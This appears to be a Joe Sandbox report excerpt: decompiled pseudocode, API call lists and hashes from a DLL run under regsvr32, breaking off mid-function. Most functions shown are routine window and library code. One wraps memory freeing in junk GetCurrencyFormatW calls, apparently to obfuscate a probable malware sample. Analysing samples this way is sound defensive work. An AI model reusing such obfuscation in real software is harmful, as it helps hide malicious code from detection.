                                                                                                            0x1001b091
                                                                                                            0x1001b091
                                                                                                            0x1001b098
                                                                                                            0x1001b0a8
                                                                                                            0x1001b0a8
                                                                                                            0x1001b0aa
                                                                                                            0x00000000
                                                                                                            0x1001b0ac
                                                                                                            0x1001b0ac
                                                                                                            0x1001b0af
                                                                                                            0x1001b0b1
                                                                                                            0x00000000
                                                                                                            0x1001b0b3
                                                                                                            0x1001b0b6
                                                                                                            0x1001b0ba
                                                                                                            0x1001b0be
                                                                                                            0x1001b0c9
                                                                                                            0x1001b0c9
                                                                                                            0x1001b0cd
                                                                                                            0x00000000
                                                                                                            0x1001b0cf
                                                                                                            0x1001b0cf
                                                                                                            0x1001b0d6
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001b0d6
                                                                                                            0x1001b0c0
                                                                                                            0x1001b0c0
                                                                                                            0x1001b0c7
                                                                                                            0x1001b0d8
                                                                                                            0x1001b0d8
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001b0c7
                                                                                                            0x1001b0be
                                                                                                            0x1001b0b1
                                                                                                            0x1001b09a
                                                                                                            0x1001b09a
                                                                                                            0x1001b09d
                                                                                                            0x00000000
                                                                                                            0x1001b09f
                                                                                                            0x1001b09f
                                                                                                            0x1001b0a6
                                                                                                            0x1001b0df
                                                                                                            0x1001b0df
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001b0a6
                                                                                                            0x1001b09d
                                                                                                            0x1001b06e
                                                                                                            0x1001b06e
                                                                                                            0x1001b071
                                                                                                            0x1001b073
                                                                                                            0x00000000
                                                                                                            0x1001b075
                                                                                                            0x1001b075
                                                                                                            0x1001b079
                                                                                                            0x00000000
                                                                                                            0x1001b07b
                                                                                                            0x1001b07b
                                                                                                            0x1001b081
                                                                                                            0x1001b084
                                                                                                            0x1001b087
                                                                                                            0x1001b089
                                                                                                            0x00000000
                                                                                                            0x1001b08b
                                                                                                            0x1001b08b
                                                                                                            0x1001b08b
                                                                                                            0x1001b089
                                                                                                            0x1001b079
                                                                                                            0x1001b073
                                                                                                            0x1001b06c
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001b022
                                                                                                            0x1001b24a
                                                                                                            0x1001afa6
                                                                                                            0x1001afa6
                                                                                                            0x1001afab
                                                                                                            0x1001afae
                                                                                                            0x1001afb3
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001afb3
                                                                                                            0x1001af80
                                                                                                            0x1001af80
                                                                                                            0x1001af85
                                                                                                            0x1001af8c
                                                                                                            0x1001af87
                                                                                                            0x1001af87
                                                                                                            0x1001af87
                                                                                                            0x1001af90
                                                                                                            0x00000000
                                                                                                            0x1001af92
                                                                                                            0x1001af9b
                                                                                                            0x1001afb5
                                                                                                            0x1001afb5
                                                                                                            0x1001afb8
                                                                                                            0x00000000
                                                                                                            0x1001afba
                                                                                                            0x1001afba
                                                                                                            0x1001afbd
                                                                                                            0x1001afbf
                                                                                                            0x1001afbf
                                                                                                            0x1001afc2
                                                                                                            0x1001afc3
                                                                                                            0x1001afc9
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001afc9
                                                                                                            0x1001af9d
                                                                                                            0x1001af9d
                                                                                                            0x1001af9d
                                                                                                            0x1001afcd
                                                                                                            0x1001afd1
                                                                                                            0x1001afd1
                                                                                                            0x1001af9b
                                                                                                            0x1001af90
                                                                                                            0x1001af6c
                                                                                                            0x1001af6c
                                                                                                            0x1001af76
                                                                                                            0x1001af7a
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001af7a
                                                                                                            0x00000000
                                                                                                            0x1001af6a
                                                                                                            0x1001afcb
                                                                                                            0x1001afcb
                                                                                                            0x00000000

                                                                                                            APIs
                                                                                                            • GetFocus.USER32(?), ref: 1001AF37
                                                                                                            • IsWindowEnabled.USER32(?), ref: 1001AF93
                                                                                                            • __EH_prolog3_catch.LIBCMT ref: 1001AFE1
                                                                                                            • GetFocus.USER32(00000028,?,00000000,?), ref: 1001B001
                                                                                                            • GetParent.USER32(?), ref: 1001B04C
                                                                                                            • GetParent.USER32(?), ref: 1001B05C
                                                                                                            • GetKeyState.USER32(00000012), ref: 1001B11A
                                                                                                            • IsDialogMessageA.USER32(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 1001B1CE
                                                                                                            • GetFocus.USER32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 1001B1E1
                                                                                                            • GetFocus.USER32(00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 1001B1EE
                                                                                                            • IsWindow.USER32(?), ref: 1001B206
                                                                                                            • GetFocus.USER32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 1001B212
                                                                                                            • IsWindow.USER32(?), ref: 1001B228
                                                                                                            • GetFocus.USER32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 1001B22E
                                                                                                            • GetKeyState.USER32(00000010), ref: 1001B257
                                                                                                            • MessageBeep.USER32(00000000), ref: 1001B34E
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.472078173.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.472074699.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472102017.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472113100.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472188714.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472194833.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472233138.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472302242.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472308618.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472318366.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Focus$Window$MessageParentState$BeepDialogEnabledH_prolog3_catch
                                                                                                            • String ID:
                                                                                                            • API String ID: 656273425-0
                                                                                                            • Opcode ID: 7cea107795b1e2e3285d96fe1b936d401bf20cc77758f65a3f6ffed830a0db35
                                                                                                            • Instruction ID: 56f928e57334fa6d51f2d895fa8adec4f86d4fba5de9bb308060e6b64de8da3e
                                                                                                            • Opcode Fuzzy Hash: 7cea107795b1e2e3285d96fe1b936d401bf20cc77758f65a3f6ffed830a0db35
                                                                                                            • Instruction Fuzzy Hash: 12F1DF35900A16AFDB11DFA0C894AAE7BF5EF49390F528029F815AF162DB34EDC1CB51
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 10003567 Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 143memoryCOMMONLIBRARYCODE
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 83%
                                                                                                            			E10003567(int _a4) {
				long _t40;
				signed int _t54;
				int _t55;
				signed int _t63;
				void* _t87;
				short* _t89;

				_t87 = _a4;
				_t35 = 0;
				if(_t87 != 0) {
					_t89 = L"eofgerDSQWzbxberfjXFSqwaKLIOrtyZD";
					if( *((intOrPtr*)(_t87 + 0x10)) != 0) {
						_a4 =  *((intOrPtr*)(_t87 + 4));
						_t63 = GetCurrencyFormatW(0, 0x11d4, _t89, 0, L"xadqsavcbdfewescGADW", 0x22b9);
						 *((intOrPtr*)(_t63 *  *0x100440d8 +  *((intOrPtr*)( *_t87 + 0x28)) + _a4))(_a4, 0, 0);
						_t35 = 0;
					}
					 *0x10046a64( *((intOrPtr*)(_t87 + 0x30)) + GetCurrencyFormatW(_t35, 0x11d4, _t89, _t35, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440cc * 8);
					_t40 = 0;
					if( *((intOrPtr*)(_t87 + 8)) == 0) {
						L9:
						if( *((intOrPtr*)(_t87 + 4)) != _t40) {
							 *((intOrPtr*)(_t87 + 0x20))( *((intOrPtr*)(_t87 + 4)), 0, GetCurrencyFormatW(_t40, 0x11d4, _t89, _t40, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440e0 + 0x8000,  *((intOrPtr*)(_t87 + 0x34)));
							_t40 = 0;
						}
						return HeapFree(GetProcessHeap(), _t40, _t87);
					} else {
						_a4 = 0;
						if(GetCurrencyFormatW(0, 0x11d4, _t89, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440cc +  *((intOrPtr*)(_t87 + 0xc)) <= 0) {
							L8:
							 *0x10046a64( *((intOrPtr*)(_t87 + 8)) + GetCurrencyFormatW(0, 0x11d4, _t89, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440dc * 4);
							_t40 = 0;
							goto L9;
						} else {
							goto L5;
						}
						do {
							L5:
							_t54 = GetCurrencyFormatW(0, 0x11d4, _t89, 0, L"xadqsavcbdfewescGADW", 0x22b9);
							_t55 = 0;
							if( *((intOrPtr*)( *((intOrPtr*)(_t87 + 8)) + (_t54 *  *0x100440cc + _a4) * 4)) != 0) {
								 *((intOrPtr*)(_t87 + 0x2c))( *((intOrPtr*)( *((intOrPtr*)(_t87 + 8)) + (GetCurrencyFormatW(0, 0x11d4, _t89, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440dc + _a4) * 4)),  *((intOrPtr*)(_t87 + 0x34)));
								_t55 = 0;
							}
							_a4 = _a4 + 1;
						} while (_a4 < GetCurrencyFormatW(_t55, 0x11d4, _t89, _t55, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440cc +  *((intOrPtr*)(_t87 + 0xc)));
						goto L8;
					}
				}
				return 0;
			}









                                                                                                            0x10003568
                                                                                                            0x1000356c
                                                                                                            0x10003570
                                                                                                            0x10003582
                                                                                                            0x1000358c
                                                                                                            0x1000359f
                                                                                                            0x100035a3
                                                                                                            0x100035bd
                                                                                                            0x100035bf
                                                                                                            0x100035bf
                                                                                                            0x100035df
                                                                                                            0x100035e5
                                                                                                            0x100035eb
                                                                                                            0x100036b4
                                                                                                            0x100036b7
                                                                                                            0x100036de
                                                                                                            0x100036e4
                                                                                                            0x100036e4
                                                                                                            0x00000000
                                                                                                            0x100035f1
                                                                                                            0x100035ff
                                                                                                            0x10003611
                                                                                                            0x1000368b
                                                                                                            0x100036ab
                                                                                                            0x100036b2
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10003613
                                                                                                            0x10003613
                                                                                                            0x10003623
                                                                                                            0x10003635
                                                                                                            0x1000363a
                                                                                                            0x10003660
                                                                                                            0x10003665
                                                                                                            0x10003665
                                                                                                            0x10003667
                                                                                                            0x10003685
                                                                                                            0x00000000
                                                                                                            0x10003613
                                                                                                            0x100035eb
                                                                                                            0x100036f9

                                                                                                            APIs
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 100035A3
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 100035CF
                                                                                                            • ??3@YAXPAX@Z.MSVCRT ref: 100035DF
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 10003603
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 10003623
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 1000364D
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 10003679
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 1000369B
                                                                                                            • ??3@YAXPAX@Z.MSVCRT ref: 100036AB
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 100036CA
                                                                                                            • GetProcessHeap.KERNEL32(00000000,000022B9,?,?,?,?,?,?,?,?,?,?,10003044,10003057,10003090,1000309F), ref: 100036E8
                                                                                                            • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,10003044,10003057,10003090,1000309F,00000000), ref: 100036EF
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.472078173.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.472074699.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472102017.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472113100.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472188714.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472194833.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472233138.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472302242.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472308618.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472318366.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CurrencyFormat$??3@Heap$FreeProcess
                                                                                                            • String ID: eofgerDSQWzbxberfjXFSqwaKLIOrtyZD$xadqsavcbdfewescGADW
                                                                                                            • API String ID: 447117116-3161301136
                                                                                                            • Opcode ID: c986ef1d440be94ff09f6e1d70f323da872e541a9ac047334e8279f144c68349
                                                                                                            • Instruction ID: f2d026fc60e697fd50327b110b185c24fe47079f9fec1f7b52e43e207d21a45c
                                                                                                            • Opcode Fuzzy Hash: c986ef1d440be94ff09f6e1d70f323da872e541a9ac047334e8279f144c68349
                                                                                                            • Instruction Fuzzy Hash: 7B415B71104705BFE215EB60CD85E67BBECEB4A385F028819F742DB5A1D732E8548F64
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 1000A2C4 Relevance: 19.7, APIs: 13, Instructions: 176windowCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 89%
                                                                                                            			E1000A2C4(void* __ebx, intOrPtr __ecx, void* __edx, intOrPtr _a4) {
				signed int _v8;
				intOrPtr _v12;
				struct tagRECT _v28;
				struct tagRECT _v44;
				struct tagRECT _v60;
				struct tagRECT _v80;
				char _v100;
				void* __edi;
				intOrPtr _t58;
				struct HWND__* _t59;
				intOrPtr _t94;
				signed int _t103;
				struct HWND__* _t104;
				void* _t105;
				struct HWND__* _t107;
				long _t108;
				long _t116;
				void* _t119;
				struct HWND__* _t121;
				void* _t123;
				intOrPtr _t125;
				intOrPtr _t129;

				_t119 = __edx;
				_t105 = __ebx;
				_t125 = __ecx;
				_v12 = __ecx;
				_v8 = E1000EEC4(__ecx);
				_t58 = _a4;
				if(_t58 == 0) {
					if((_v8 & 0x40000000) == 0) {
						_t59 = GetWindow( *(__ecx + 0x20), 4);
					} else {
						_t59 = GetParent( *(__ecx + 0x20));
					}
					_t121 = _t59;
					if(_t121 != 0) {
						_t104 = SendMessageA(_t121, 0x36b, 0, 0);
						if(_t104 != 0) {
							_t121 = _t104;
						}
					}
				} else {
					_t4 = _t58 + 0x20; // 0xc033d88b
					_t121 =  *_t4;
				}
				_push(_t105);
				GetWindowRect( *(_t125 + 0x20),  &_v60);
				if((_v8 & 0x40000000) != 0) {
					_t107 = GetParent( *(_t125 + 0x20));
					GetClientRect(_t107,  &_v28);
					GetClientRect(_t121,  &_v44);
					MapWindowPoints(_t121, _t107,  &_v44, 2);
				} else {
					if(_t121 != 0) {
						_t103 = GetWindowLongA(_t121, 0xfffffff0);
						if((_t103 & 0x10000000) == 0 || (_t103 & 0x20000000) != 0) {
							_t121 = 0;
						}
					}
					_v100 = 0x28;
					if(_t121 != 0) {
						GetWindowRect(_t121,  &_v44);
						E10008551(_t121, E100084E6(_t121, 2),  &_v100);
						CopyRect( &_v28,  &_v80);
					} else {
						_t94 = E10005CAE();
						if(_t94 != 0) {
							_t94 =  *((intOrPtr*)(_t94 + 0x20));
						}
						E10008551(_t121, E100084E6(_t94, 1),  &_v100);
						CopyRect( &_v44,  &_v80);
						CopyRect( &_v28,  &_v80);
					}
				}
				_t108 = _v60.left;
				asm("cdq");
				_t123 = _v60.right - _t108;
				asm("cdq");
				_t120 = _v44.bottom;
				_t116 = (_v44.left + _v44.right - _t119 >> 1) - (_t123 - _t119 >> 1);
				_a4 = _v60.bottom - _v60.top;
				asm("cdq");
				asm("cdq");
				_t129 = (_v44.top + _v44.bottom - _v44.bottom >> 1) - (_a4 - _t120 >> 1);
				if(_t116 >= _v28.left) {
					if(_t123 + _t116 > _v28.right) {
						_t116 = _t108 - _v60.right + _v28.right;
					}
				} else {
					_t116 = _v28.left;
				}
				if(_t129 >= _v28.top) {
					if(_a4 + _t129 > _v28.bottom) {
						_t129 = _v60.top - _v60.bottom + _v28.bottom;
					}
				} else {
					_t129 = _v28.top;
				}
				return E1000F1A1(_v12, 0, _t116, _t129, 0xffffffff, 0xffffffff, 0x15);
			}

























                                                                                                            0x1000a2c4
                                                                                                            0x1000a2c4
                                                                                                            0x1000a2cb
                                                                                                            0x1000a2ce
                                                                                                            0x1000a2d6
                                                                                                            0x1000a2d9
                                                                                                            0x1000a2de
                                                                                                            0x1000a2ec
                                                                                                            0x1000a2fe
                                                                                                            0x1000a2ee
                                                                                                            0x1000a2f1
                                                                                                            0x1000a2f1
                                                                                                            0x1000a304
                                                                                                            0x1000a308
                                                                                                            0x1000a314
                                                                                                            0x1000a31c
                                                                                                            0x1000a31e
                                                                                                            0x1000a31e
                                                                                                            0x1000a31c
                                                                                                            0x1000a2e0
                                                                                                            0x1000a2e0
                                                                                                            0x1000a2e0
                                                                                                            0x1000a2e0
                                                                                                            0x1000a320
                                                                                                            0x1000a32e
                                                                                                            0x1000a337
                                                                                                            0x1000a3d7
                                                                                                            0x1000a3de
                                                                                                            0x1000a3e5
                                                                                                            0x1000a3ef
                                                                                                            0x1000a33d
                                                                                                            0x1000a33f
                                                                                                            0x1000a344
                                                                                                            0x1000a34f
                                                                                                            0x1000a358
                                                                                                            0x1000a358
                                                                                                            0x1000a34f
                                                                                                            0x1000a35c
                                                                                                            0x1000a363
                                                                                                            0x1000a3a4
                                                                                                            0x1000a3b3
                                                                                                            0x1000a3c0
                                                                                                            0x1000a365
                                                                                                            0x1000a365
                                                                                                            0x1000a36c
                                                                                                            0x1000a36e
                                                                                                            0x1000a36e
                                                                                                            0x1000a37e
                                                                                                            0x1000a391
                                                                                                            0x1000a39b
                                                                                                            0x1000a39b
                                                                                                            0x1000a363
                                                                                                            0x1000a3fe
                                                                                                            0x1000a403
                                                                                                            0x1000a408
                                                                                                            0x1000a40c
                                                                                                            0x1000a40f
                                                                                                            0x1000a416
                                                                                                            0x1000a41e
                                                                                                            0x1000a426
                                                                                                            0x1000a42e
                                                                                                            0x1000a435
                                                                                                            0x1000a43a
                                                                                                            0x1000a446
                                                                                                            0x1000a44e
                                                                                                            0x1000a44e
                                                                                                            0x1000a43c
                                                                                                            0x1000a43c
                                                                                                            0x1000a43c
                                                                                                            0x1000a454
                                                                                                            0x1000a463
                                                                                                            0x1000a46b
                                                                                                            0x1000a46b
                                                                                                            0x1000a456
                                                                                                            0x1000a456
                                                                                                            0x1000a456
                                                                                                            0x1000a483

                                                                                                            APIs
                                                                                                              • Part of subcall function 1000EEC4: GetWindowLongA.USER32 ref: 1000EECF
                                                                                                            • GetParent.USER32(?), ref: 1000A2F1
                                                                                                            • SendMessageA.USER32(00000000,0000036B,00000000,00000000), ref: 1000A314
                                                                                                            • GetWindowRect.USER32 ref: 1000A32E
                                                                                                            • GetWindowLongA.USER32 ref: 1000A344
                                                                                                            • CopyRect.USER32 ref: 1000A391
                                                                                                            • CopyRect.USER32 ref: 1000A39B
                                                                                                            • GetWindowRect.USER32 ref: 1000A3A4
                                                                                                            • CopyRect.USER32 ref: 1000A3C0
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.472078173.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.472074699.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472102017.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472113100.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472188714.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472194833.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472233138.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472302242.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472308618.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472318366.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Rect$Window$Copy$Long$MessageParentSend
                                                                                                            • String ID:
                                                                                                            • API String ID: 808654186-0
                                                                                                            • Opcode ID: 9ff1ffca443c0671e985d08d4d0a79713c159cacf4ec812370c5e182881e21c9
                                                                                                            • Instruction ID: 63e85339992314f50ad76cd4fa936f515b0dc0fc70569d21828395b99dd1d8a3
                                                                                                            • Opcode Fuzzy Hash: 9ff1ffca443c0671e985d08d4d0a79713c159cacf4ec812370c5e182881e21c9
                                                                                                            • Instruction Fuzzy Hash: 2C513F76D00619AFEB01CBA8CC85EEEBBB9EB49390F154214F905B7195D730EE858B60
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 100056D9 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 56libraryloaderCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E100056D9(intOrPtr* __ecx, void* __esi, intOrPtr _a4) {
				void* __ebx;
				void* __edi;
				void* __ebp;
				_Unknown_base(*)()* _t9;
				struct HINSTANCE__* _t15;
				void* _t16;
				intOrPtr* _t18;
				char _t19;
				intOrPtr _t21;
				_Unknown_base(*)()* _t22;
				_Unknown_base(*)()* _t23;

				_t16 = __esi;
				_t12 = __ecx;
				_t18 = __ecx;
				 *__ecx = _a4;
				_a4 = 0;
				_t19 =  *0x10046ad4; // 0x0
				if(_t19 == 0) {
					_t15 = GetModuleHandleA("KERNEL32");
					_t20 = _t15;
					if(_t15 == 0) {
						L2:
						E10004E6E(0, _t12, _t15, _t16, _t20);
					}
					 *0x10046ac4 = GetProcAddress(_t15, "CreateActCtxA");
					 *0x10046ac8 = GetProcAddress(_t15, "ReleaseActCtx");
					 *0x10046acc = GetProcAddress(_t15, "ActivateActCtx");
					_t9 = GetProcAddress(_t15, "DeactivateActCtx");
					_t21 =  *0x10046ac4; // 0x0
					 *0x10046ad0 = _t9;
					_t16 = _t16;
					if(_t21 == 0) {
						__eflags =  *0x10046ac8; // 0x0
						if(__eflags != 0) {
							goto L2;
						} else {
							__eflags =  *0x10046acc; // 0x0
							if(__eflags != 0) {
								goto L2;
							} else {
								__eflags = _t9;
								if(__eflags != 0) {
									goto L2;
								}
							}
						}
					} else {
						_t22 =  *0x10046ac8; // 0x0
						if(_t22 == 0) {
							goto L2;
						} else {
							_t23 =  *0x10046acc; // 0x0
							if(_t23 == 0) {
								goto L2;
							} else {
								_t20 = _t9;
								if(_t9 == 0) {
									goto L2;
								}
							}
						}
					}
					 *0x10046ad4 = 1;
				}
				return _t18;
			}














                                                                                                            0x100056d9
                                                                                                            0x100056d9
                                                                                                            0x100056df
                                                                                                            0x100056e3
                                                                                                            0x100056e6
                                                                                                            0x100056e9
                                                                                                            0x100056f0
                                                                                                            0x10005701
                                                                                                            0x10005703
                                                                                                            0x10005705
                                                                                                            0x10005707
                                                                                                            0x10005707
                                                                                                            0x10005707
                                                                                                            0x10005721
                                                                                                            0x1000572e
                                                                                                            0x1000573b
                                                                                                            0x10005740
                                                                                                            0x10005742
                                                                                                            0x10005748
                                                                                                            0x1000574d
                                                                                                            0x1000574e
                                                                                                            0x10005766
                                                                                                            0x1000576c
                                                                                                            0x00000000
                                                                                                            0x1000576e
                                                                                                            0x1000576e
                                                                                                            0x10005774
                                                                                                            0x00000000
                                                                                                            0x10005776
                                                                                                            0x10005776
                                                                                                            0x10005778
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10005778
                                                                                                            0x10005774
                                                                                                            0x10005750
                                                                                                            0x10005750
                                                                                                            0x10005756
                                                                                                            0x00000000
                                                                                                            0x10005758
                                                                                                            0x10005758
                                                                                                            0x1000575e
                                                                                                            0x00000000
                                                                                                            0x10005760
                                                                                                            0x10005760
                                                                                                            0x10005762
                                                                                                            0x00000000
                                                                                                            0x10005764
                                                                                                            0x10005762
                                                                                                            0x1000575e
                                                                                                            0x10005756
                                                                                                            0x1000577a
                                                                                                            0x1000577a
                                                                                                            0x10005786

                                                                                                            APIs
                                                                                                            • GetModuleHandleA.KERNEL32(KERNEL32,00000000,?,00000020,10006175,000000FF), ref: 100056FB
                                                                                                            • GetProcAddress.KERNEL32(00000000,CreateActCtxA), ref: 10005719
                                                                                                            • GetProcAddress.KERNEL32(00000000,ReleaseActCtx), ref: 10005726
                                                                                                            • GetProcAddress.KERNEL32(00000000,ActivateActCtx), ref: 10005733
                                                                                                            • GetProcAddress.KERNEL32(00000000,DeactivateActCtx), ref: 10005740
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.472078173.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.472074699.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472102017.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472113100.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472188714.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472194833.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472233138.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472302242.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472308618.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472318366.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AddressProc$HandleModule
                                                                                                            • String ID: ActivateActCtx$CreateActCtxA$DeactivateActCtx$KERNEL32$ReleaseActCtx
                                                                                                            • API String ID: 667068680-3617302793
                                                                                                            • Opcode ID: 399c8412fe992e4a50a3ddfc252fd3a3d78dcfedf62abfe816ac053d2fec79fd
                                                                                                            • Instruction ID: 1d76d1e4db1a962794084fd329e7408aae32bd70e769f2b2ddda66e1b27d4fc6
                                                                                                            • Opcode Fuzzy Hash: 399c8412fe992e4a50a3ddfc252fd3a3d78dcfedf62abfe816ac053d2fec79fd
                                                                                                            • Instruction Fuzzy Hash: B51188B5809666DEF701EF65DEC040B7AE4E70A682705902FE108E2564E73218589F0B
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 100080BA Relevance: 16.6, APIs: 11, Instructions: 139COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 94%
                                                                                                            			E100080BA(void* __ebx, signed int __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t54;
				void* _t58;
				signed int _t59;
				signed int _t63;
				signed short _t71;
				signed int _t84;
				void* _t94;
				struct HINSTANCE__* _t96;
				signed int _t97;
				void* _t98;
				signed int _t100;
				void* _t101;
				void* _t102;

				_t102 = __eflags;
				_t94 = __edx;
				_push(0x24);
				E1001FBF7(E10033165, __ebx, __edi, __esi);
				_t100 = __ecx;
				 *((intOrPtr*)(_t101 - 0x20)) = __ecx;
				 *(_t101 - 0x1c) =  *(__ecx + 0x60);
				 *(_t101 - 0x18) =  *(__ecx + 0x5c);
				_t54 = E1000EC09(__ebx, __edi, __ecx, _t102);
				_t96 =  *(_t54 + 0xc);
				_t84 = 0;
				_t103 =  *(_t100 + 0x58);
				if( *(_t100 + 0x58) != 0) {
